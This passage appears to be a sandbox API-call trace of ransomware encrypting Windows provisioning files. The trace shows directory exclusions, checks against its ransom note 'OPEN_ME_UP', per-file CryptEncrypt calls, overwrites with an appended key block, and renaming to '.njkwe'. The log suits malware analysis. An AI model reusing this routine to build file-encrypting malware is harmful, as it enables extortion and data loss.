lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\371__connections_cellular_yeniseytelecom (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.689] GetProcessHeap () returned 0xbe0000 [0078.689] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.689] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d9b6fb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d9b6fb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d9b6fb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="372__C~1.PRO")) returned 1 [0078.689] lstrcmpiW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.689] lstrcmpiW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.689] lstrcmpiW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.689] lstrcmpiW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.689] lstrcmpiW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.689] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml") returned 165 [0078.689] StrStrIW (lpFirst="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.690] lstrcmpW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.690] lstrcmpW (lpString1="372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.690] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\372__connections_cellular_mobily (saudi arabia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.690] GetTickCount () returned 0x1154003 [0078.690] GetTickCount () returned 0x1154003 [0078.691] GetTickCount () returned 0x1154003 [0078.691] GetTickCount () returned 0x1154003 [0078.691] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.691] GetProcessHeap () returned 0xbe0000 [0078.691] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.691] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.692] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.692] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.692] GetProcessHeap () returned 0xbe0000 [0078.692] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.692] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.692] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.692] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.693] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.693] CloseHandle (hObject=0x43c) returned 1 [0078.693] GetProcessHeap () returned 0xbe0000 [0078.693] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.693] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\372__connections_cellular_mobily (saudi arabia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\372__Connections_Cellular_Mobily (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\372__connections_cellular_mobily (saudi arabia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.693] GetProcessHeap () returned 0xbe0000 [0078.693] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.693] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d9b6fb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d9b6fb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d9b6fb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="373__C~1.PRO")) returned 1 [0078.693] lstrcmpiW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.693] lstrcmpiW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.693] lstrcmpiW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.694] lstrcmpiW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.694] lstrcmpiW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.694] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml") returned 165 [0078.694] StrStrIW (lpFirst="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.694] lstrcmpW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.694] lstrcmpW (lpString1="373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.694] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.694] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\373__connections_cellular_mobily (saudi arabia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.694] GetTickCount () returned 0x1154003 [0078.694] GetTickCount () returned 0x1154003 [0078.694] GetTickCount () returned 0x1154003 [0078.694] GetTickCount () returned 0x1154003 [0078.694] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.694] GetProcessHeap () returned 0xbe0000 [0078.694] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.694] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.696] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.696] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.696] GetProcessHeap () returned 0xbe0000 [0078.696] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.696] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.696] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.696] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.696] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.696] CloseHandle (hObject=0x43c) returned 1 [0078.696] GetProcessHeap () returned 0xbe0000 [0078.696] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.696] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\373__connections_cellular_mobily (saudi arabia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\373__Connections_Cellular_Mobily (Saudi Arabia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\373__connections_cellular_mobily (saudi arabia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.697] GetProcessHeap () returned 0xbe0000 [0078.697] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.697] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d9b6fb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d9b6fb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d9b6fb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="374__C~1.PRO")) returned 1 [0078.697] lstrcmpiW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.697] lstrcmpiW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.697] lstrcmpiW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.697] lstrcmpiW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.697] lstrcmpiW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.697] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.697] StrStrIW (lpFirst="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.697] lstrcmpW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.697] lstrcmpW (lpString1="374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.697] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.697] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\374__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.698] GetTickCount () returned 0x1154003 [0078.698] GetTickCount () returned 0x1154003 [0078.698] GetTickCount () returned 0x1154003 [0078.698] GetTickCount () returned 0x1154003 [0078.698] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.698] GetProcessHeap () returned 0xbe0000 [0078.698] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.698] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1cf, lpOverlapped=0x0) returned 1 [0078.699] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.699] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1cf, lpOverlapped=0x0) returned 1 [0078.699] GetProcessHeap () returned 0xbe0000 [0078.699] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.699] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.699] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.702] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.702] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.702] CloseHandle (hObject=0x43c) returned 1 [0078.703] GetProcessHeap () returned 0xbe0000 [0078.703] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.703] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\374__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\374__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\374__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.704] GetProcessHeap () returned 0xbe0000 [0078.704] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.704] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90dc1962, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90dc1962, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90dc1962, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x291, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="375__C~1.PRO")) returned 1 [0078.704] lstrcmpiW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.704] lstrcmpiW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.704] lstrcmpiW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.704] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml") returned 175 [0078.704] StrStrIW (lpFirst="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.704] lstrcmpW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.704] lstrcmpW (lpString1="375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.704] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.704] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\375__connections_cellular_mtc saudi arabia (saudi arabia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.704] GetTickCount () returned 0x1154013 [0078.704] GetTickCount () returned 0x1154013 [0078.704] GetTickCount () returned 0x1154013 [0078.704] GetTickCount () returned 0x1154013 [0078.704] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.704] GetProcessHeap () returned 0xbe0000 [0078.704] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.704] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.706] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0078.706] GetProcessHeap () returned 0xbe0000 [0078.706] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.706] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.706] WriteFile (in: hFile=0x43c, 